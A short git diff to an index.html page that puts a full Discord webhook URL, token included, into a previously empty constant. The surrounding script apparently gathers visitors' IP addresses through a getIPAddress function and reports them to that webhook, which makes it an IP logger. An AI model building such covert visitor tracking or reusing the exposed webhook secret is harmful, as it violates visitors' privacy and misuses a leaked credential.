--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
     <h1></h1>
     <script>
         // Replace with your Discord webhook URL
-        const webhookURL = '';
+        const webhookURL = 'https://discord.com/api/webhooks/1306317315608150098/ahMdK4-dxtaLDjJVFdUt6chuDd4AKEnFi8w5H-La6Kz1kLOYOFISO02khd-kr8ScOxVO';
 
         // Function to get IP address
         function getIPAddress() {
